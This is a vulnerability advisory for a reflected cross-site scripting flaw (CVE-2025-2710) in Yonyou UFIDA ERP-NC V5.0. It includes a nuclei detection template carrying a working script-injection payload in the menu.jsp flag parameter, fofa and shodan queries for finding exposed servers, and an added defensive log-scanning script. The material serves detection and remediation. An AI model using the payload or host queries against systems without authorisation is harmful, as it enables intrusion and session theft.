Yonyou UFIDA ERP-NC V5.0 Cross-Site Scripting Vulnerability

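Vulnerability Information

Vulnerability Name: Yonyou UFIDA ERP-NC V5.0 Cross-Site Scripting Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-2710

Vulnerability Type: Cross-site scripting

Severity: Medium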

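Description: Yonyou UFIDA ERP-NC V5.0 is a widely used enterprise resource planning (ERP) system designed to help enterprises manage and integrate their business processes. It is widely deployed by enterprises in China and other regions, particularly for financial management, supply chain management and human resources management. The vulnerability is in the system's menu.jsp page: user input in the flag parameter is not properly sanitized or validated, resulting in a reflected cross-site scripting (XSS) vulnerability. An attacker can craft a malicious URL and lure a victim into clicking it, causing arbitrary JavaScript to execute in the victim's browser. Exploitation can lead to session hijacking, credential theft or other malicious activity within the ERP system. Because the vulnerability can be exploited without user authentication and can be scanned for and attacked at scale with automated tools, it poses a medium-level security threat to enterprises using this version of the ERP system.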

Vendor: yonyou

Product: ufida_erp-nc

Affected Version: 5.0

Search Syntax: icon_hash="1085941792" || title:"用友"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/36d56c38377a985be8a9f7f762cc8d17eef5ebb6/http%2Fcves%2F2025%2FCVE-2025-2710.yaml

Type: projectdiscovery/nuclei-templates:github issues

PoC Details

id: CVE-2025-2710

info:
  name: Yonyou UFIDA ERP-NC V5.0 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    Yonyou UFIDA ERP-NC V5.0 is vulnerable to reflected cross-site scripting (XSS) via the flag parameter in menu.jsp. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
  impact: |
    Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities in the ERP system.
  remediation: |
    Update Yonyou UFIDA ERP-NC to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the flag parameter in menu.jsp.
  reference:
    - https://github.com/Hebing123/cve/issues/85
    - https://nvd.nist.gov/vuln/detail/CVE-2025-2710
  classification:
    cve-id: CVE-2025-2710
    cwe-id: CWE-79
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cpe: cpe:2.3:a:yonyou:ufida_erp-nc:5.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: yonyou
    product: ufida_erp-nc
    fofa-query: icon_hash="1085941792"
    shodan-query: title:"用友"
  tags: cve,cve2025,xss,erp-nc,ufida,yonyou

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.jsp"

    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_any(tolower(body), "yonyou nc", "name=\"ncapplet")'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/menu.jsp?flag=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<script>alert(document.domain)</script>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
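
A defender-side check for the issue described above, as an added example that is not part of the original page or the nuclei template: it scans web access logs for requests to menu.jsp whose flag parameter fails an allow-list, decoding repeated percent-encoding first. The log format, the sample lines and the allow-list pattern are assumptions, since the page does not say which flag values are legitimate.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (documentation IP ranges), not from a real system.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Apr/2025:10:00:01 +0800] "GET /menu.jsp?flag=1 HTTP/1.1" 200 512
198.51.100.9 - - [01/Apr/2025:10:00:05 +0800] "GET /menu.jsp?flag=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1" 200 640
198.51.100.9 - - [01/Apr/2025:10:00:09 +0800] "GET /menu.jsp;jsessionid=ABC?flag=%253C/script%253E HTTP/1.1" 200 633
203.0.113.4 - - [01/Apr/2025:10:01:00 +0800] "GET /index.jsp?flag=%3Cb%3E HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# Assumed allow-list for legitimate flag values; adjust to what your deployment sends.
SAFE_FLAG = re.compile(r"[A-Za-z0-9_-]{0,32}")

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_flag_requests(log_text):
    """Return (client_ip, status, decoded_flag) for menu.jsp hits whose flag fails the allow-list."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        url = urlsplit(target)
        path = url.path.split(";")[0].lower()  # drop ;jsessionid=... path parameters
        if not path.endswith("/menu.jsp"):
            continue
        for raw in parse_qs(url.query, keep_blank_values=True).get("flag", []):
            flag = fully_decode(raw)  # parse_qs has already decoded one round
            if not SAFE_FLAG.fullmatch(flag):
                hits.append((client, status, flag))
    return hits

if __name__ == "__main__":
    for hit in suspicious_flag_requests(SAMPLE_LOG):
        print(hit)
```

The same allow-list can be enforced at a reverse proxy or WAF in front of menu.jsp as a stopgap until the vendor update is applied.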